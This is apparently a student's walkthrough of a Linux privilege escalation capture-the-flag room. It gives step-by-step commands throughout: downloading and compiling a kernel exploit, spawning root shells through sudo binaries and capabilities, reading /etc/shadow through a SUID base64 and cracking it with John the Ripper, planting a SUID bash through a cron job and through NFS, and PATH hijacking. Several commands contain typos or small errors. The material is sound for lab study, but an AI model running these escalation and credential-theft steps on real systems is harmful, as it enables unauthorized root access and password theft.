Task 1 (Introduction)

This task gives us introductory information about Privilege Escalation and

what to do in this room.

Question:

Read the above.

No answer needed

Task 2 (What is Privilege

Escalation?)
What does “privilege escalation” mean?

Privilege Escalation usually involves going from a lower permission account

to a higher permission one. More technically, it’s the exploitation of a
vulnerability, design flaw, or configuration oversight in an operating system
or application to gain unauthorized access to resources that are usually
restricted from the users.

There are 2 types of Privilege Escalation

Vertical and Horizontal Privilege Escalation

Vertical Privilege Escalation:

• Vertical privilege escalation involves gaining higher levels of access

within the same system or environment. For example, if a user starts
with regular user privileges and manages to elevate their access to an
administrator or root level, it is considered vertical privilege escalation.

Horizontal Privilege Escalation:

• Horizontal privilege escalation, on the other hand, involves gaining the

same level of access but on a different account or user. In this
scenario, an attacker with standard user privileges aims to
compromise another user’s account with similar privileges.

Why is it important?

It’s rare when performing a real-world penetration test to be able to gain a

foothold (initial access) that gives you direct administrative access. Privilege
escalation is crucial because it lets you gain system administrator levels of
access, which allows you to perform actions such as:

• Resetting passwords
• Bypassing access controls to compromise protected data
• Editing software configurations
• Enabling persistence
• Changing the privilege of existing (or new) users
• Execute any administrative command

Question:

Read the above.

no answer needed.

Task 3 (Enumeration)
Questions:

1. What is the hostname of the target system?

Solution No1

• we just use $hostname command to learn the hostname of the target

system. The $hostname command will return us the hostname of the
target machine.

Solution No2

• we can also use $uname command to learn information about target

machine this commad have multiple options
uname --help #shows command options and usage for you

uname -n #print the network node hostname

Solution No3

• when you in a system and you only see $ in terminal you can use this
trick
bash -i

• This commad gives us a interactive shell and we can see the username
and hostname of the target machine

Answer: wade7363

2. What is the Linux kernel version of the target system?

Solution No1

• again we use $uname commads -r option to learn about kernel

version of the Target machine
uname -r #print the kernel release

Answer: 3.13.0–24-generic

3. What Linux is this?

Solution No1

• we use $lsb_release commad to learn about Linux distribution and

version of the Target machine.
lsb_release -d #show description of this distribution

lsb_release -a #show all of the above information

Solution No2

• The Linux version is located in the issue file in the etc folder. If we
read the issue file using the cat command, we can find out the Linux
version of this machine.
cat /etc/issue

Answer: Ubuntu 14.04 LTS

4. What version of the Python language is installed on the system?

Solution
 • If we want to know python or any other program or tools version we
simple use — version option in linux
<commad or program> --version

python --version

Answer: 2.7.6

5. What vulnerability seem to affect the kernel of the target

system?(Enter a CVE number)

CVE (Common Vulnerabilities and Exposures) is a program that

identifies, defines, and catalogs publicly disclosed cybersecurity
vulnerabilities. Each vulnerability is assigned a unique CVE ID number.
These IDs are used to reference specific security flaws in various software
applications or libraries.

Solution

• To find the CVE number, we need to go to exploit-db.com and

search for the Linux kernel version on this site.

• Exploit-db also preinstalled in Kali Linux you simple search in your

terminal with tool called searchsploit
searchsploit <version or name of service>

searchsploit 3.13.0
Answer: CVE-2015–1328

Task 4 (Automated Enumeration

Tools)
This task shows a link to enumerate tools that will make our work easier.
Using them will help us save time don’t be shy use all of them until you find
your favorite

Question:

Install and try a few automated enumeration tools on your local Linux
distribution

no answer needed.

Task 5 (Privilege Escalation:

Kernel Exploits)
Questions:

1. Find and use the appropriate kernel exploit to gain root

privileges on the target system.

Solution

• First, as in the previous task, we search for an exploit corresponding to

the kernel version of our Linux on the exploit-db.com website, in
previous task we use searchsploit commad to find our payload and use
-m option to copy our payload to are current directory
searchsploit <Kernerl version of the target>

searchsploit -m <payload name> #Mirror (aka copies) an exploit to the current working
director
 • now we need to send this payload to the target machine to do this we
use python server and wget commad
pyhton3 -m http.server <port is optional> #when you don't know ports server start default
port 8000

ifconfig tun0 #this command show your VPN ip address

• to send this payload to the Target machine we use go to /tmp use

wget commad to download our payload file into the Target machine
wget http://<VPN IP>:<port>/<name of the file>

wget http://10.8.95.15:8080/37292.c

• Then we need to make a compiler to run the downloaded c file. We use

the gcc command to compile.
gcc -static <C file> -o <filename>

gcc -static 37292 -o exploit

./exploit #to run program

and now we root!

no answer needed.

2. What is the content of the flag1.txt file?

Solution

• in default user stored in /home folder in linux ,Then we can read the
content of the flag1.txt file using the cat command.
note: when you get root or get shell it is difficult to use the shell this Trick is
for you, use export commad to change shell environment
export TERM=xterm

Task 6 (Privilege Escalation:

Sudo)
Questions :

1. How many programs can the user “karen” run on the target
system with sudo rights?

Solution

• In this task, we need to use the sudo -l command to find out how
many programs the user karen can run on the target system.
sudo -l #this commad shows files that same user run as root with sudo commad
Answer: 3

2. What is the content of the flag2.txt file?

Solution No1

• In this task we need to be root to read the flag2.txt file. First we go to

gtfobins website and learn how to run these commands as root. We
will use less commad to get root
sudo less <file to read>

!/bin/bash

Solution No2

• In this task we see other commads that have permission to use as root
one of them is find commad
sudo find . exec /bin/sh \; -quit
 • To Find flag2.txt location we again use find commad
find / -name flag2.txt 2>/dev/null

3.How would you use Nmap to spawn a root shell if your user had
sudo rights on nmap?

Solution

• In this task, We go our favorite site gtfobins again and search nmap
commads sudo usage
 • Here we Have 2 options but we go with the easy one
sudo nmap --interactive
nmap> !sh

Answer: sudo nmap — interactive

4.What is the hash of frank’s password?

Solution

• In this task we need frank user’s password in linux users password

hashes stored in /etc/shadow file we just simple read /etc/shadow
file previous task we use less commad
Sudo less /etc/shadow

Task 7 (Privilege Escalation:

SUID)
Questions :

1. Which user shares the name of a great comic book writer?

Solution
 • We need to look at the passwd file to see the users. We can read the
passwd file in the etc directory using the cat command
cat /etc/passwd

2. What is the password of user2?

Solution

• First we will take a look at SUID permissions of files with find

commad
find / -type f -perm -04000 -ls 2>/dev/null
 • To crack a user’s password, we need to create a file by merging the
passwd and shadow files with the unshadow command. We can
read the passwd file, but we are not allowed to read the shadow file.
But we see that there is suid in the base64 command, so we can use
base64. To read it with base64, we first encrypt it with base64, then
decode it by typing base64 -d and read it.
/usr/bin/base64 /etc/shadow | /usr/bin/base64 -d
to create unshadow we copy passwd and shadow contents separate files
and use unshadow commad
unshadow passwd shadow | tee cracked

we use JohnTheRipper tool to crack users passwords with rockyou.txt

wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt cracked
3.What is the content of the flag3.txt file?

Solution

• First we switch to user2 with password we cracked. Now we are

looking for the flag3.txt file with the find command.
su user2 #use password previously cracked

find / -name flag3.txt 2>/dev/null #to find flag3.txt location

• After finding it, we will read it using the base64 command, as in the
previous task.
/usr/bin/base64 /home/ubuntu/flag3.txt | /usr/bin/base64 -d

Task 8 (Privilege Escalation:

Capabilities)
Questions :

1. Complete the task described above on the target system.

Solution No1 :
 • Let’s see how to become root using capabilities. First, let’s use the
command getcap -r / 2>/dev/null to see what has capabilites
permissions.
getcap -r / 2>/dev/null

• There are 6 commad have capabilites permissions we will first look at

vim command search for our command on gtfobins and select
capabilities.
./vim -c ':python import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

#check pyhton version

Solution No2

• Second commad is view that also has capability permission. We

willsearch for our command on gtfobins and select capabilities.
./view -c ':python import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

#check python version

no answer needed.

2. How many binaries have set capabilities?

Solution

• To see this, we must use the “getcap -r/2>/dev/null”

command from the previous task.
getcap -r / 2>/dev/null

Answer: 6

3. What other binary can be used through its capabilities?

Solution :

• We can see that two binaries have capabilities, view and vim.
Answer: view

4. What is the content of the flag4.txt file?

Solution

• To Find flag4.txt we will use find commad like our previous task
find / -name flag4.txt 2>/dev/null

Task 9 (Privilege Escalation: Cron

Jobs)
Questions :

1. How many user-defined cron jobs can you see on the target
system?

Solution

• We need to read the crontab file in the etc folder with the cat
command.
cat /etc/cronjob
Answer: 4

2. What is the content of the flag5.txt file?

Solution

• For Our firs method we use backup.sh file to gain root for this we use
SIUD permission. We need to be root to read the flag5.txt file. We
see that we have a sh file that is automatically run every minute. To
become root, we just need to change the contents of the backup.sh
file using the nano backup.sh command.
nano banckup.sh

• we just need to give suid permission to /bin/bash, then we can run

it and become root. We will use the chmod command to give suid
permission.
#!/bin/bash
chmod u+s /bin/bash #u+s is used give SUID permission

after we edit the backup.sh file we give all permission with chmod commad
after that just simple use /bin/bash -p commad to gain root
chmod 777 backup.sh

/bin/bash -p

3. What is Matt’s password?

solution

we copy matt’s passwd and shadow files in our Host machine and in the
previous task we use unshadow commad and use the JohnTheRipper to
crack the password
grep matt /etc/shadow

grep matt /etc/passwd

unshadow passwd shadow | tee Password

john --wordlist=/usr/share/wordlists/rockyou.txt
Task 10 ( Privilege Escalation:
PATH)
Questions :

1. What is the odd folder you have write access for?

solution :

• To find out we need to use the command find / -writable

2>/dev/null.

Answer: /home/murdoch

2. Exploit the $PATH vulnerability to read the content of the flag6.txt

file.

Solution

• First of all, to become root, we need to go to the tmp folder, create a

file called thm, and then type /bin/bash into it.
echo "bin/bash" > thm

chmod 777 thm

export $PATH=/tmp:$PATH
cd /home/murdoch

./test

no answer needed.

3. What is the content of the flag6.txt file?

Solution

• We use Find commad to locate flag6.txt’s location and use cat commad
to read it’s content
find / -name flag6.txt 2>/dev/null

Task 11 (Privilege Escalation:

NFS)
Questions

1. How many mountable shares can you identify on the target

system?

Solution :

• To find out, we need to use the showmount command.

showmount -e <Target Machine IP address>

Answer: 3

2. How many shares have the “no_root_squash” option enabled?

Solution

• Here we need to read the export file in the etc folder using the cat
command.
cat /etc/exports

Answer: 3

3. Gain a root shell on the target system

Solution

• Then we create a connection between the two machines using the

following command. So with this command, I will create a connection
between the NFS folder on my machine and the sharedfolder folder
on the victim’s machine.
• Now we create a c file in the backdoor folder we created on our
machine and write the c code given to us.
#Our Host machine
mkdir /tmp/backdoor
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/backdoor
cd /tmp/backdoor
cp /bin/bash .
chmod +s bash

#Target Machine
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell

• Now we first compile this code by typing gcc -static nfs.c -o nfs.

• Then we give suid permission to the nfs file.

chmod +s nfs

• Now we go to the sharedfolder folder on the victim machine and type

./ to run this code and become root.

No answer needed

4. What is the content of the flag7.txt file?

Solution :

Now we find and read the flag7.txt file

find / -name flag7.txt 2>/dev/null
./home/matt/flag7.txt
cat ./home/matt/flag7.txt

no answer needed.

Task 12 (Capstone Challenge)

Questions :

1. What is the content of the flag1.txt file?

Solution :

• First, we need to see what has suid permissions so we know which

commands we can run as root. We will find this with the command
find / -type f -perm -04000 -ls 2>/dev/null .

• We see that the base64 command has suid permissions, so as in the

previous task, we can encrypt the shadow file with the base64
command and then decode and read it.
/usr/bin/base64 /etc/shadow | /usr/bin/bsae64 -d

• Then we create passwd and shadow files in the tmp folder on our
machine. We copy the password and shadow files from the victim’s
machine there. We then create a hash file from them using the
unshadow command.
unshadow passdw shadow | tee hash

• We then use the john command to crack the passwords.

 • Here we see that the password for the missy user is Password1. We
can now log in to the missy user.
su missy
Password: Password1

• Then we find and read the flag1.txt file.

find / -name flag1.txt 2>/dev/null

base64 /home/missy/Documents/flag1.txt | base64 -d

2. What is the content of the flag2.txt file?

Solution :

• Now we need to be root to read flag2.txt. First, let’s see which

commands we can run as root without being root by typing sudo -l.

• We see that we can use the find command! Now let’s go to gtfobins
and see how we can become root using the find command.

• Now we can become root just by typing this command!

sudo find . -exec /bin/sh \; -quit

• Now we just need to find and read the flag2.txt file.

find / -name flag2.txt 2>/dev/null

cat flag2.txt